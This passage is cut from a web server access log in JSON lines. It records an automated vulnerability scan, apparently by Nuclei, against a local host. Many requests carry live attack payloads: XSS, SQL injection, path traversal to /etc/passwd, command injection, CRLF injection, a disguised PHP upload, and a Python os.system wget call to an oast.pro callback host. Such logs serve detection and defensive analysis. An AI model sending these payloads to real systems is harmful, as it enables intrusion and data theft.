"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /accounts/login?next=/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.111","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"referer=%2Fthruk&login=--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=Thruk+Monitoring+Webinterface","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /thruk/cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"127.0.0.1/thruk/cgi-bin/login.cgi?thruk", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /super/login.html?lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'297MPS3rD6Q6yJSDUPI3QobmQiG'); INSERT INTO extra_field_options(option_value) VALUES ('297MPS3rD6Q6yJSDUPI3QobmQiG'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '297MPS3rD6Q6yJSDUPI3QobmQiG', 16,0) ON DUPLICATE KEY UPDATE tag='297MPS3rD6Q6yJSDUPI3QobmQiG', field_id=16, count=0; -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/mysql2i/mysql2i.func.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.107","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_imagebrowser&folder=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.104","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ansible.cfg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.112","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/bgservlets/test.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"login=admin&pwd=admin&lang=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /op/op.Login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /core/config/databases.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.122","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common_page/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/phpmailer/phpmailer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/snapshots/:key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/page_start.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test') or 1=1 -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm/file.cgi?next_file=%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /druid/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"{\x22password\x22: \x22{{password}}\x22, \x22identifier\x22: \x22{{username}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/backup-db/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/admin/common/clearcache?previousUrl=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /device.rsp?opt=user&cmd=list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"option_key=a&perpose=update&callback=phpinfo","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-----------------------------31046105003900160576454225745\x0D\x0AContent-Disposition: form-data; name=\x22fileToUpload\x22; filename=\x22297MPRsSpi3aKdVD4OjK7OH7x9G.php\x22\x0D\x0AContent-Type: image/gif\x0D\x0A\x0D\x0AGIF89a213213123ProjectDiscoverydwisiswant0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/xmlrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/users/admin/check HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?post_type=post&s=%22%3E%3Cscript%3Ealert(/297MPSy4DGsLAgDaKuhukdeYh4n/)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fc9v8gvgsmpv8bafg0t00yj3ogtbeeomxj.oast.pro%22%29%3Bprint%28crypt.crypt%28%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/change HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ossim/session/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/authportal/bounce.php?url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fc9v8gvgsmpv8bafg0t00z8y71u1yr6dse.oast.pro%22%29%3Bprint%28crypt.crypt%28%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"action=ucmm_mc_api&apiKey=-c9v8gvgsmpv8bafg0t00mtrm8eufwi5bx.oast.pro%2Ftest%2Ftest%2Ftest%3Fkey1%3Dval1%26dummy%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CMSPages/GetDocLink.ashx?link=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"dir=%2Fetc%2F&onlyFiles=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 